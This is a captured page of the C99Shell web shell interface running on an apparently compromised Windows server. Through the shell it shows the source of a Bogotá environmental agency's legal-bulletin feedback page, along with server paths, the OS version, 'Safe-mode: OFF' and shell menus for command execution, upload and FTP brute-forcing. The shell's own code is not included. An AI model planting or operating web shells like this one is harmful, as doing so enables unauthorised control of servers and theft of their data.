!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA\boletinlegal\   drwxrwxrwx
Free 9.43 GB of 239.26 GB (3.94%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     sugerencias.php (8.04 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Inicio</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="style.css" rel="stylesheet" type="text/css" />
<link href="styles2.css" rel="stylesheet" type="text/css"  />
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/jquery.scrollTo-min.js"></script>
<script type="text/javascript" src="js/jquery.scrollShow.js"></script>

<style type="text/css">

h8 {font-size: 3em; margin: 0px 0;}.container {width: 460px; margin: 0px auto; font: 10px normal Verdana, Arial, Helvetica, sans-serif;
    color: #444; }
ul.tabs {
    margin: 0;
    padding: 0;
    float: left;
    list-style: none;
    height: 32px;
    border-bottom: 1px solid #999;
    border-left: 1px solid #999;
    width: 100%;
}
ul.tabs li {
    float: left;
    margin: 0;
    padding: 0;
    height: 31px;
    line-height: 31px;
    border: 1px solid #999;
    border-left: none;
    margin-bottom: -1px;
    background: #E4E2CC;
    overflow: hidden;
    position: relative;
}
ul.tabs li a {
    text-decoration: none;
    color: #000;
    display: block;
    font-size: 1.2em;
    padding: 0 20px;
    border: 1px solid #fff;
    outline: none;
}
ul.tabs li a:hover {
    background:  #FCFAE6;
}    
html ul.tabs li.active, html ul.tabs li.active a:hover  {
    background: #FCFAE6;
    border-bottom: 1px solid #fff;
}
.tab_container {
    border: 1px solid #999;
    border-top: none;
    clear: both;
    float: left; 
    width: 100%;
    background: #FCFAE6;
    -moz-border-radius-bottomright: 5px;
    -khtml-border-radius-bottomright: 5px;
    -webkit-border-bottom-right-radius: 5px;
    -moz-border-radius-bottomleft: 5px;
    -khtml-border-radius-bottomleft: 5px;
    -webkit-border-bottom-left-radius: 5px;
}
.tab_content {
    padding: 20px;
    font-size: 1.2em;
}
.tab_content h9 {
    font-weight: normal;
    padding-bottom: 10px;
    border-bottom: 1px dashed #ddd;
    font-size: 1.8em;
}
.tab_content h10 a{
    color: #254588;
}
.tab_content img {
    float: left;
    margin: 0 20px 20px 0;
    border: 1px solid #ddd;
    padding: 5px;
}
</style>

<style>
        .black_overlay{
            display: none;
            position: absolute;
            top: 0%;
            left: 0%;
            width: 100%;
            height: 200%;
            background-color: black;
            z-index:1001;
            -moz-opacity: 0.8;
            opacity:.80;
            filter: alpha(opacity=80);
        }
        .white_content {
            display: none;
            position: absolute;
            top: 25%;
            left: 10%;
            width: 80%;
            height: 100%;
            padding: 16px;
            border: 16px solid #A5B924;
            background-color: white;
            z-index:1002;
            overflow: auto;
        }
    </style>

<script type="text/javascript">

$(document).ready(function() {

    //Default Action
    $(".tab_content").hide(); //Hide all content
    $("ul.tabs li:first").addClass("active").show(); //Activate first tab
    $(".tab_content:first").show(); //Show first tab content
    
    //On Click Event
    $("ul.tabs li").click(function() {
        $("ul.tabs li").removeClass("active"); //Remove any "active" class
        $(this).addClass("active"); //Add "active" class to selected tab
        $(".tab_content").hide(); //Hide all tab content
        var activeTab = $(this).find("a").attr("href"); //Find the rel attribute value to identify the active tab + content
        $(activeTab).fadeIn(); //Fade in the active content
        return false;
    });

});
</script> 
<script type="text/javascript">
jQuery(function( $ ){
    //borrowed from jQuery easing plugin
    //http://gsgd.co.uk/sandbox/jquery.easing.php
    $.easing.backout = function(x, t, b, c, d) {
        var s=1.70158;
        return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
    };
    $('#screen').scrollShow({
        view:'#view',
        content:'#images',
        easing:'backout',
        wrappers:'crop',
        navigators:'a[id]',
        navigationMode:'sr',
        circular:true,
        start:0
    });
});
</script>
<style type="text/css">

#background-image
{
    font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
    font-size: 12px;
    margin: 45px;
    width: 480px;
    text-align: left;
    border-collapse: collapse;
    background: url('images/blurry.jpg') 330px 59px no-repeat;
}
#background-image th
{
    padding: 12px;
    font-weight: normal;
    font-size: 14px;
    color: #90AE1A;
}
#background-image td
{
    padding: 9px 12px;
    color: #666;
    border-top: 1px solid #fff;
}
#background-image tfoot td
{
    font-size: 11px;
}
#background-image tbody td
{
    background: url('images/back.png');
}
* html #background-image tbody td
{
    /* 
       ----------------------------
        PUT THIS ON IE6 ONLY STYLE 
        AS THE RULE INVALIDATES
        YOUR STYLESHEET
       ----------------------------
    */
    filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='table-images/back.png',sizingMethod='crop');
    background: none;
}    
#background-image tbody tr:hover td
{
    color: #339;
    background: none;
}
</style>
<SCRIPT LANGUAGE="JavaScript">
function popup(page) {
window.open(page,'popup','width=457,height=350,toolbar=false,scrollbars=false,top=60,left=330');
}
</SCRIPT>

</head>
<body>

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/es_LA/sdk.js#xfbml=1&version=v2.8";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<?php include_once("analyticstracking.php"); ?>
<div class="main">
  <div class="header">
    <div class="head_2">
      <div class="block_header"><img src="images/cabezote BLEGAL.jpg" width="960" height="150" border="0" />
        
      </div>
      <div class="menu">
        <ul>
          <li><a href="index.php">Inicio</a></li>
          <li><a href="normativa.php">Normativa</a></li>
          <li><a href="actos.php">Actos Administrativos</a></li>
          <li><a href="doctrina.php">Doctrina</a></li>
          <li><a href="jurisprudencia.php" >Jurisprudencia</a></li>
      <li><a href="conceptos.php" >Conceptos</a></li>
        </ul>
      </div>
     
      <div class="text">
        <div class="left_t"></div>
        <div class="right_t"><a href="sugerencias.php"><img src="images/subscribe-icon-big.png" alt="Sugerencias" title="Sugerencias" width="31" height="28" border="0" align="right" /></a>
                 <a href="#"><img src="images/historia.png" alt="Boletínes Anteriores" title="Boletínes Anteriores" width="31" height="28" border="0" align="right" /></a>
                    <img src="images/registro-usuarios.png" alt="Regístrese" title="Regístrese" width="28" height="26" border="0" align="right" onclick="popup('registro/index.php')"/>
            </div>
      </div>
    </div>
  </div>
  </div>
  <div class="clr"></div>
  <div class="body">
    <h2><span>Ayudanos</span> a Mejorar</h2>
  </div>
  
  <div class="body body_bg">
  
  <p align="center">
  <p>La Secretaría Distrital de Ambiente, consciente de la importancia del constante mejoramiento en la gestión pública, pone a disposición este espacio, con el ánimo de recibir comentarios o sugerencias que permitan mejorar exclusivamente el aplicativo Web <b>Boletín Legal Ambiental.</b> </p>
  
<div class="fb-comments" data-href="http://190.27.245.106/BLA/boletinlega/sugerencias.php" data-numposts="10"></div> 


    <div class="clr"><table border="0">
            <tbody>
            <tr>

              <td width="20%"><img src="images/tel.png" alt="Teléfonos de contacto" width="20" height="20"> +57 (1) 3778814 - 3778911  <img src="images/icono-email.png" alt="Correo electrónico" title="Correo electrónico" width="20" height="20" /> boletinlegalambiental@ambientebogota.gov.co</td>
      </tr> </tbody></table> </div>
  </div>
</div>
<div class="clr"></div>
<div class="footer">
  <p align="center"><a href="#">INICIO</a>|<a href="#">NORMATIVA</a>|<a href="#">ACTOS ADMINISTRATIVOS</a>|<a href="#">DOCTRINA</a>|<a href="#">JURISPRUDENCIA</a> <a href="#"></a> </p>
  <p align="center">© Copyright 2011. SECRETARIA DISTRITAL DE AMBIENTE. TODOS LOS DERECHOS RESERVADOS</p>
</div>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.4992 ]--